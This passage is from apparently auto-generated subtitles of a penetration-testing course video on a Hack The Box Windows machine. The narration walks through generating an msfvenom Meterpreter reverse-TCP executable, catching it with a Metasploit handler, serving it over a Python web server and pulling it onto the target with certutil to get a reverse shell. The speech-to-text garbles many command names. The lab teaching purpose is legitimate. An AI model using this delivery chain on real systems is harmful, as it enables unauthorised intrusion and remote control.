You know we can look at the ARB see who we're talking to sorry our dash a we're not talking to anybody

374
00:26:03,480 --> 00:26:07,770
but ten two and ten to two fifty five.

375
00:26:08,010 --> 00:26:09,480
Now this really isn't useful again.

376
00:26:09,480 --> 00:26:13,890
This is just for your knowledge it's not going to be very useful in a hack the box environment like

377
00:26:13,890 --> 00:26:18,660
this if you're doing like a lab environment super useful to see who it's talking to.

378
00:26:18,660 --> 00:26:19,950
Same thing with net stack.

379
00:26:19,950 --> 00:26:23,570
Same thing with the root route print on Windows.

380
00:26:23,970 --> 00:26:25,240
So OK.

381
00:26:25,260 --> 00:26:30,230
We found our flags this is cool but we're still in that limited flexibility.

382
00:26:30,570 --> 00:26:36,010
So let's go ahead and talk about how we can improve the shell again we're going to use medicinally.

383
00:26:36,030 --> 00:26:39,580
We're going to do this a little bit outside the box this time.

384
00:26:39,630 --> 00:26:44,700
So what I want to do is I want to create a reverse shell to this machine.

385
00:26:44,820 --> 00:26:52,040
We're going to generate a new reverse shell so we'll come into here and we'll we'll use MSF then I'm

386
00:26:52,040 --> 00:26:53,340
like before.

387
00:26:53,760 --> 00:27:01,380
So we'll say MSF venom we'll do a payload here windows because we know it's a Windows machine.

388
00:27:01,560 --> 00:27:07,100
X sixty four because we know it's 64 bit and will they say interpreter

389
00:27:09,890 --> 00:27:13,570
and then we'll try shell reverse TCT.

390
00:27:13,580 --> 00:27:15,280
And that may or may not work.

391
00:27:15,500 --> 00:27:18,550
So we'll try staged an on stage here.

392
00:27:18,620 --> 00:27:23,160
Our l host again is minus 10 to 10 to 14.

393
00:27:23,230 --> 00:27:29,260
Twenty six the El port is going to be let's do 5 5 5 5.

394
00:27:29,270 --> 00:27:34,580
So we don't interfere with the all fours are already on and then all we need is a file type which is

395
00:27:34,580 --> 00:27:45,310
e XY and we'll put that into a show all those call s h dot XY let that generate on top of that.

396
00:27:45,310 --> 00:27:49,710
Let's go ahead and go into Metis flight and we'll say Hey Metis flight.

397
00:27:50,200 --> 00:27:51,820
How are you doing.

398
00:27:51,820 --> 00:27:53,620
I want to run your exploit handler.

399
00:27:53,650 --> 00:28:02,380
So this should look familiar from last time and it looks like I picked up a bad a bad shell here so

400
00:28:02,380 --> 00:28:04,330
maybe I don't know what I'm doing.

401
00:28:04,450 --> 00:28:10,600
So let's go into use exploit mole Thai handler and let's see what the name of that is.

402
00:28:10,720 --> 00:28:20,730
So we'll say set payload and we'll say Windows you a tab it's a little slow x 60 for interpreter I think

403
00:28:20,730 --> 00:28:22,730
it's just maybe reverse DCP.

404
00:28:23,610 --> 00:28:24,120
Yeah.

405
00:28:24,230 --> 00:28:35,870
I shall reverse DCP it's just reverse DCP and delete that regenerate it sorry and come back in here

406
00:28:35,870 --> 00:28:43,430
while that's regenerating we could say options and will this a set I'll host.

407
00:28:43,460 --> 00:28:53,120
Same thing we just specified fourteen not twenty six set out for all five and now we're just going to

408
00:28:53,120 --> 00:28:54,440
run this and listen on it

409
00:28:58,720 --> 00:29:00,050
said it failed to bind.

410
00:29:00,060 --> 00:29:08,670
Why is it failing to bind let's check our IP one more time Fourteen that twenty four guys I am screwing

411
00:29:08,670 --> 00:29:09,530
up so bad.

412
00:29:10,160 --> 00:29:10,700
OK.

413
00:29:11,760 --> 00:29:15,510
Hopefully you're running the right IP address and you're not being like me.

414
00:29:16,660 --> 00:29:19,210
I have to fix this payload really quick.

415
00:29:19,210 --> 00:29:29,470
To be twenty four I've been doing the offshore labs all week all last week in my IP addresses was a

416
00:29:29,470 --> 00:29:30,330
little bit different.

417
00:29:30,360 --> 00:29:32,980
So that's kind of why I'm getting these numbers mixed up.

418
00:29:34,410 --> 00:29:34,870
OK.

419
00:29:34,910 --> 00:29:40,920
So we're running on this now and we are also running on the correct payload.

420
00:29:41,040 --> 00:29:45,140
So how do we get a file onto a Windows machine.

421
00:29:45,150 --> 00:29:50,490
Well first and foremost we need to host a web server.

422
00:29:50,490 --> 00:29:55,920
The easiest way to host a web server is with python.

423
00:29:55,920 --> 00:30:09,270
Now we could to save Python dash M and we could say h TTP simple sorry simple H TTP server on 80 like

424
00:30:09,270 --> 00:30:10,640
this.

425
00:30:10,640 --> 00:30:14,070
And that's going to load up a simple HP server.

426
00:30:14,100 --> 00:30:20,500
So we're in here and now we're hosting up every single file that is in this root folder.

427
00:30:20,560 --> 00:30:21,370
So that's a nice thing.

428
00:30:21,370 --> 00:30:24,090
We've got instant access to everything that's here.

429
00:30:24,090 --> 00:30:30,750
We can cut it out as soon as we want to and be done so we can go to our 10 not 10 not 14 not twenty

430
00:30:30,750 --> 00:30:33,910
four and see everything that I'm hosting here.

431
00:30:34,170 --> 00:30:39,660
And then as soon as I don't want to host it anymore and you can see what's going on as well that status

432
00:30:39,660 --> 00:30:43,900
commands awesome control C I come back and it's dead.

433
00:30:44,220 --> 00:30:46,110
So it's just for as long as you need it.

434
00:30:46,800 --> 00:30:50,480
So we've got the the shell now being hosted.

435
00:30:50,730 --> 00:31:00,500
And when we talk about collecting a or transporting files on windows there is a tool that's on there.

436
00:31:00,560 --> 00:31:05,270
Now it's starting to get picked up by a defender but for a long time it didn't.

437
00:31:05,550 --> 00:31:09,050
So on assessments it still works fairly well.

438
00:31:09,050 --> 00:31:15,220
What we can do here is a built in tool now everybody knows about W get for Linux.

439
00:31:15,230 --> 00:31:20,760
This is my idea of the quick and dirty way of doing like a W get for Windows.

440
00:31:20,780 --> 00:31:23,300
That's not very commonly well known.

441
00:31:23,420 --> 00:31:28,020
So let's just go and say we'll just put it on in the fly folder that's fine.

442
00:31:29,030 --> 00:31:30,740
So we'll say sir you tell

443
00:31:33,380 --> 00:31:41,840
cert you tail like a type and we're going to say dash you or I'll cash meaning we're bringing over a

444
00:31:41,840 --> 00:31:52,490
file the you or l we're going to do a dash F for the file and say hey I'm going to grab 10 10 14 20

445
00:31:52,550 --> 00:31:55,640
four slash s h dot EMC.

446
00:31:55,830 --> 00:32:04,680
And while I'm at it let's put that file in users administrator desktop flags and we'll also call it

447
00:32:04,740 --> 00:32:10,050
s h dot EMC OK you can see it grabbed it we can say Dir.

448
00:32:10,050 --> 00:32:14,040
Just to make sure ok essay shot is in here.

449
00:32:14,040 --> 00:32:19,440
And on top of that if we go to our file server you can see that s h that you see was actually retrieved

450
00:32:19,490 --> 00:32:20,760
by a file server.

451
00:32:20,760 --> 00:32:24,990
So this is nice when you're running like a blind payload on a web server and you don't know if it's

452
00:32:24,990 --> 00:32:26,250
actually downloading.

453
00:32:26,340 --> 00:32:31,370
You can have a download something to see if you got command execution like this and know for sure that

454
00:32:31,380 --> 00:32:32,500
something came through.

455
00:32:32,520 --> 00:32:43,120
I ran into that this just this past weekend actually so from here we going to say S H E EMC run it and

456
00:32:43,120 --> 00:32:44,080
look what happened.

457
00:32:44,080 --> 00:32:47,090
We now have a return printer reverse shell.

458
00:32:47,290 --> 00:32:57,010
Now in the real world this is going to be picked up fairly fairly easily I would imagine.

459
00:32:57,790 --> 00:33:03,070
But you know we could obfuscate this more but in a situation like this or even a bad environment where

460
00:33:03,070 --> 00:33:08,220
they don't have good 80 something like this is not going to get picked up at all.

461
00:33:08,230 --> 00:33:13,420
So this is just a nice way to show you like hey we can get a return pretty session and now we can just

462
00:33:13,420 --> 00:33:14,280
do a hash.

463
00:33:14,520 --> 00:33:17,190
You know we have control over what we can do.

464
00:33:17,530 --> 00:33:19,990
And we have a lot more flexibility again.

465
00:33:20,020 --> 00:33:25,510
So yes it ends in interpreter but we went a very manual method of doing it.

466
00:33:25,540 --> 00:33:27,160
We also what did we learn today.

467
00:33:27,160 --> 00:33:30,910
We learned default credentials are very bad and can lead to very bad things.

468
00:33:30,940 --> 00:33:38,320
We learned that we can use some nifty little tricks in for loops and get something done very quick with

469
00:33:38,320 --> 00:33:40,210
some basic bash scripting.

470
00:33:40,210 --> 00:33:45,190
We learned how to use burb suite we learned about repeater in the proxies an intruder.

471
00:33:45,190 --> 00:33:49,420
A lot of cool features in there that will only dive into more as we go.

472
00:33:49,420 --> 00:33:55,660
And we learned how to transfer files on a Windows machine to improve a shell and just you know get better

473
00:33:55,690 --> 00:33:56,700
overall.

474
00:33:56,710 --> 00:34:01,030
So thank you so much for joining me and until next time my name is TCM.

475
00:34:01,040 --> 00:34:01,960
Thank you for having me.